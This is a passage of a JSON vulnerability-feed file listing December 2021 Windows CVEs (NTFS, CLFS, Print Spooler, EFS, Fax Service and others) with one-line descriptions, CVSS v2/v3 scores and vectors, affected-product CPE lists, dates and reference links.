4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43231", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43231", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:47", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43230, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43229", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43229", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43229", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:42", "description": "Windows Common Log File System Driver Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43224", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43224"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2021-43224", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43224", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T07:49:37", "description": "Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43216", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43216"], "modified": "2022-05-23T17:42:00", "id": "PRION:CVE-2021-43216", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43216", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2023-08-16T08:05:18", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43883", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43883"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43883", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43883", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:37", "description": "iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43215", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43215"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-43215", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:18:15", "description": "Windows Print Spooler Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-41333", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-41333", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-41333", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:38", "description": "Windows Encrypting File System (EFS) Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43217", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43217"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43217", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:56", "description": "Windows Fax Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43234", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43234"], "modified": "2022-05-23T17:42:00", "id": "PRION:CVE-2021-43234", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T08:03:12", "description": "Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43893", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43893", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43893", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:50:00", "description": "Windows Remote Access Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43238", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43238"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43238", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43238", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:47:45", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43207.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43226", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43226", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:47:44", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43236.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43222", "cwe": ["CWE-668"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43222", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:43", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43207", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43207", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43207", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", 